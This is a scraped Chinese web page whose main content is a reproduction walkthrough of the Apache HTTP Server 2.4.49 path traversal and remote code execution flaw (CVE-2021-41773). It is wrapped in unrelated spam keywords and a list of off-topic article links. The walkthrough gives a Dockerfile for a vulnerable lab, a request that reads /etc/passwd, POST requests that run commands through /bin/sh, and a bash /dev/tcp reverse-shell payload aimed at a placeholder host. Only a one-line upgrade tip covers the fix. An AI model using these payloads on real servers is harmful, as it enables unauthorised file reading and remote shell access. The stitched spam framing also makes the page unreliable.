当前位置: 首页 > news >正文

英文网站建设价格室内设计知名网站

news 2026/4/8 12:34:11
英文网站建设价格,室内设计知名网站,最新网络游戏排行榜2021前十名,微网站策划方案简介#xff1a; Apache HTTP Server是一个开源、跨平台的Web服务器#xff0c;它在全球范围内被广泛使用。2021年10月5日#xff0c;Apache发布更新公告#xff0c;修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞#xff08;CVE-2021-41773#xff09;。… 简介 Apache HTTP Server是一个开源、跨平台的Web服务器它在全球范围内被广泛使用。2021年10月5日Apache发布更新公告修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞CVE-2021-41773。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护默认禁用则这些恶意请求就会成功。除此之外该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 漏洞描述  在对 Apache HTTP Server 2.4.49 中的路径规范化所做的更改中发现一个缺陷。穿越的目录允许被访问比如配置了Directory /Require all granted/Directory攻击者可能使用路径遍历攻击将 URL 映射到类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“require all denied”的保护则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本则可以允许远程执行代码。此问题仅影响 Apache 2.4.49而不影响早期版本。 CVE Record | CVEhttps://www.cve.org/CVERecord?idCVE-2021-41773 指纹app:“apache web server 2.4.49 2.4.50” 影响版本 ​ Apache HTTP Server 2.4.49 漏洞复现 靶场准备 docker环境搭建: mkdir Dockerfile //在空目录里面创建Dockerfile目录 cd Dockerfile //进入Dockerfile目录 vi Dockerfile //创建文件Dockerfil并编写编辑DockerFile文件内容 FROM httpd:2.4.49RUN set -ex \ sed -i s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g /usr/local/apache2/conf/httpd.conf \ sed -i s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g /usr/local/apache2/conf/httpd.conf \ sed -i s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g /usr/local/apache2/conf/httpd.conf \ cat /usr/local/apache2/conf/httpd.conf \| tr \n \r \| perl -pe s|Directory /.*?/Directory|Directory /\n AllowOverride none\n Require all granted\n/Directory|isg \| tr \r \n \| tee /tmp/httpd.conf \ mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf 执行构建操作  docker build -t httpd:2.4.49rce . 运行docker: docker run -d -p 85:80 httpd:2.4.49rce 浏览器访问85端口出现“It works!”说明部署成功: poc 目录遍历POC: curl -v --path-as-is http://XXXXX:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd或者 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 exp  POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: xx.xx.xx.xx:xx Content-Type: text/plain Content-Length: 8echo; id curl -s --path-as-is -d echo Content-Type: text/plain; echo; id xx.xx.xx.xx:xx/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 反弹shell: POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: 123.58.224.8:63275 Content-Type: text/plain Content-Length: 50echo; bash -c 0168-;exec 168/dev/tcp/xx.xx.xx.xx/xx;bash 168 168 2168 漏洞修复  升级Apache HTTP Server到最新版本
http://www.w-s-a.com/news/643567/

相关文章:

  • 什么是网站设计第一装修网
  • 公司网站建设一条织梦门户网站源码
  • 网站改版中su域名注册
  • 做网站有没有前途济南产品网站建设外包
  • 网站备案咨询做静态网站多少钱
  • 软件开发和网站建设一样吗太原今天最新通知
  • 网站推广如何做的表白制作网站
  • 网站风格分析免费织梦网站源码
  • 大连手机自适应网站建设织梦做音乐网站
  • 烟台网站建设优化网页设计师证
  • 手机微网站建设多少钱个人网站 wordpress
  • 做外贸是不是必须有网站wordpress网络图片
  • 赣县企业网站建设用dw做网站的基本步骤
  • 辽源网站建设微信小程序公众平台
  • 多媒体网站设计开发是指什么常宁网站建设
  • 淄博网站推广优化17岁在线观看免费高清完整版
  • 企业形象网站开发业务范畴wordpress最好最全的教程
  • 企业网站的建立意义网站首页制作网站
  • 网站制作过程内容深圳最好的活动策划公司
  • 深圳网站关键词排名查询公司网站怎么做啊
  • 微网站 制作平台广州电商聚集地
  • 建设外国商城网站网站服务器 虚拟主机
  • 天河网站建设开发电子商务公司名字大全
  • 站长推荐为何用wdcp建立网站连不上ftp
  • 云南旅行社网站开发学编程多久可以写游戏辅助
  • 推广网站的步骤网站备案号中信息有变
  • 优秀企业建站织梦能不能做门户网站
  • 广东省建设局官方网站wordpress 自动安装 插件怎么用
  • 哪类小网站容易做h5页面制作代码
  • 北京网站建设公司华网百度热搜seo